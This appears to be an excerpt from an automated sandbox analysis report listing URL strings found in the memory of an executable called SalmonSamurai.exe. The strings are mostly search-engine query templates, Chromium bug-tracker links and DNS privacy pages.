Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.icohttp://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.icohttp://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.icohttp://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.icohttp://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/favicon.icohttp://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.delta-search.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/api/suggestOS?suggestQuery=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/favicon.icohttp://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.searchnu.com/web?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.walla.co.il/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/155
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1563
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1564
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1579
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/193
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/237
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/27
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/271
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/286
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/342
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/343
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/36
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/402
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/42
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/434
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/480
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/537
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/549
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/56
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/582
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/633
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/666
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/667
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/673
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/727
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/776
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/792
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/838
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/840
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/949
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/960
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/966
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/new
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint.
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint/1003
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dawn.googlesource.com/dawn/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.icohttps://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
